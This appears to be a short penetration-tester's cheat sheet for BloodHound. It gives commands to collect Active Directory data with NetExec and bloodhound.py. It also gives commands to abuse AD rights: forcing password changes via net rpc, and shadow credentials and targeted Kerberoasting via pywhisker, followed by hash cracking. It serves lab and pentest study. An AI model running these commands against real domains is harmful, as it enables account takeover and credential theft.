Bloodhound CheatSheet


1.0 Installation

apt install bloodhound

2.0 Configuration

neo4j console
2025-01-03 14:44:26.560+0000 INFO  Bolt enabled on localhost:7687.
2025-01-03 14:44:27.123+0000 INFO  Remote interface available at http://localhost:7474/
2025-01-03 14:44:27.125+0000 INFO  id:

Connect to http://localhost:7474/ and change default password from neo4j:neo4j to something better.

3.0 Usage

Run with:

bloodhound

3.1 Collect AD Data

3.1.1 NetExec

nxc ldap $ip -u $user -p $pass
nxc ldap $ip -u $user -p $pass --bloodhound --collection All
nxc ldap $ip -u $user -p $pass --bloodhound --collection All --dns-server $dnsip

3.1.2 bloodhound.py

git clone https://github.com/dirkjanm/BloodHound.py

# Method 1 (DNS IP):
python bloodhound.py -d $domain.local -u $user -p $pass -c All,LoggedOn -dc $dcname.$domain.local --zip -ns $dnsip

# Method 2 (DNS Name):
python bloodhound.py -d $domain -c All,LoggedOn --zip -ns $dnsserv -u $user@$domain -p $pass

3.2 Attribute Attacks

3.2.1 ForceChangePassword

net rpc password $targetuser $targetpass -U 'domain.local/'$user'%'$pass -S 'domain.local'

3.2.2 GenericAll

Manipulate msDs-KeyCredentialLink and request TGT:

pywhisker -d 'domain.local' -u $user -p $pass --target $targetuser --action 'add'
python targetedKerberoast.py -v -d 'domain.local' -u $user -p $pass

Afterwards, crack the hash with hashcat:

![[hashcat#1.2 Kerberos TGT]]

3.2.3 GenericWrite

4.0 Hints

  • Mark all owned users as owned!
  • Select user and check AD permissions
    • Node info
    • Transitive Object Control
    • local admin

4.1 Custom Queries

git clone https://github.com/CompassSecurity/BloodHoundQueries
cd BloodHoundQueries
BloodHound_Custom_Queries_Merger
./bloodhound-customqueries-downloader

5.0 References

6.0 Tags

  • #OS/Kali
  • #Label/CheatSheet
  • #public